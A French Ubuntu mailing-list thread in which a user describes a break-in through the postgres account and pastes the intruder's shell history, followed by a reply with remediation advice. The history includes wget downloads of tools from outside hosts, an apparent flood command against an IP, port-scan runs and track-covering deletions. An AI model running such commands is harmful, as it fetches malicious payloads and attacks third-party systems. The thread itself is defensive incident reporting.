J'ai un router et pour le moment j'ai bloqué toutes les redirections de port qui menaient à ma machine et j'ai bloqué pour que ssh n'accèpte que mon user à moi. Chose étrange, d'habitude c'est la première chose que je fais... et j'ai oublié cette fois!
Mon erreur... je crois... c'est que j'ai installé le serveur postgres 8.1 pour faire du dev localement il y a 2 jours. Le hacker, s'est loggé justement avec le user postgres simplement. (Y A UN MOT DE PASSE SUR LA CONSOLE POUR POSTGRES PAR DEFAUT???????).
Et... j'ai la chance d'avoir son .bash_history. Je le recopie plus bas... Si vous voyez quelque chose... dîtes-le moi svp. Je me foues un peu de le publier car je crois que cela va beaucoup plus aider les gens ici à BLOQUER ce genre de choses plutôt que de gens à hacker...
J'ai vu les wget et j'ai averti les "abuse" des serveurs qui héberge ça... ainsi que les propriétaires des IP via le whois de où il envoie certaines données. Si jamais les fichiers ne sont plus sur les serveurs du bash_history, j'ai fait un wget à nouveau pour les sauvegarder ici pour les examiner.
Moi de ce que je vois, c'est qu'il a rien pris de ma machine du tout. Il s'apprêtait seulement à installer des choses pour aller attaquer une autre cible totalement. Il n'a pas semblé s'intéressé à aucun de mes fichiers. Il semblait scanner des ports et scanner pour passer root.
J'ai aussi l'impression qu'il y avait 2 personnes en même temps sur ma machine.
J'ai aussi l'impression que je les ai arrêté assez rapidement dans leur démarche.
J'ai vérifié mes auth.log, le bash_history, le /etc/passwd, le ps aux
J'ai changé le password de postgres...
J'ai passé ces 2 outils et tout est ok je pense:
$ apt-cache search rootkit
chkrootkit - Checks for signs of rootkits on the local system
rkhunter - rootkit, backdoor, sniffer and exploit scanner
Le seul fichier que j'ai changé après l'installation de postgres était:
# TYPE DATABASE USER CIDR-ADDRESS METHOD
# "local" is for Unix domain socket connections only
local all all ident sameuser
# IPv4 local connections:
host all postgres 127.0.0.1/32 trust
host all all 127.0.0.1/32 md5
# IPv6 local connections:
host all all ::1/128 md5
J'avais fait les coins ronds car ce n'était qu'un test... je n'avais plus de temps et j'y serais revenu plus tard. Je voulais simplement voir si ça marchait avec pgadmin3. J'avais encore rien mis dedans. Mais je pense pas que ce fichier change quelque chose...
Le fichier .bash_history de postgres:
(et j'ai vérifié, c'est vraiment le début du fichier)
$ cat bash_history_attak
uptime
cat /proc/cpuinfo
uname -a
wget
passwd
cikalaka
passwd
uptime
tar
cd /var/tmp
ls
ls -all
rm -rf .mr004.tar.filepart
ping www.yahoo.com
wget
wget http://rooot.xhost.ro/fld.tgz
tar zxvf fld.tgz
rm -rf fld.tgz
cd .fl
./x 200.68.192.253 53 0
cd /var/tmp
ls -all
rm -rf .fl
uptime
ls -all
cat /proc/cpuinfo
wget
wget http://mundd.net/xxl.tgz
tar zxvf xxl.tgz
rm -rf xxl.tgz
cd .mr004
./start 193.2
./start 193.41
./start 83.103
ftp
screen
ls -all
tar zxvf shelp.tar
rm -rf shelp.tar
mv start a
./shelp 81
./shelp 83
ls -all
rm -rf 81.0.pscan.22
rm -rf 83.0.pscan.22
./shelp 83
On 3/27/06, Patrice Karatchentzeff <
[EMAIL PROTECTED]> wrote:
Le 27/03/06, Free Mind< [EMAIL PROTECTED]> a écrit :
> J'ai vraiment la confirmation qu'un intrus est entré... J'ai postgresql 8.1
> d'installé via apt-get seulement depuis hier... et hop, j'ai un
> .bash_history avec la liste des commandes et des fichiers qu'il a déposé
> dans /var/tmp/.mr004
>
> Comment a-t-il fait pour entrer en console avec le user postgres? Je n'ai
> encore presque rien changé dans les config de postgres. Quel est le mot de
> passe par défaut à l'install et comment ce fait-il que c'est possible de
> loguer avec ce user??????
>
> J'ai bloqué pour permettre que mon usager d'entrer dans SSH en tous les cas.
Ce n'est pas suffisant. SI le gars est balèze, il a très bien pu
prévoir aussi le coup...
Il faut déconnecter *totalement* la machine du réseau.
Ensuite, il faut être très méticuleux pour chasser l'intrus. Si tu ne
te sens pas assez fort - c'est loin d'être trivial - le mieux est
encore de réinstaller entièrement la machine. Y compris les données
(AVANT l'attaque).
Toutefois, vues les traces laissées, l'attaquant n'a pas l'air d'être
très balèze... tout dépend de toi en fait.
Remarque importante : une machine de prod en unstable (puisque c'est
une Dapper) n'est PAS une bonne sauf si l'on maîtrise PARFAITEMENT son
sujet (et donc que l'on est capable d'assurer soi-même la sécurité de
sa machine, ce qui ne semble pas être ton cas).
Bref, chat échaudé...
-- ubuntu-fr mailing list [email protected] https://lists.ubuntu.com/mailman/listinfo/ubuntu-fr
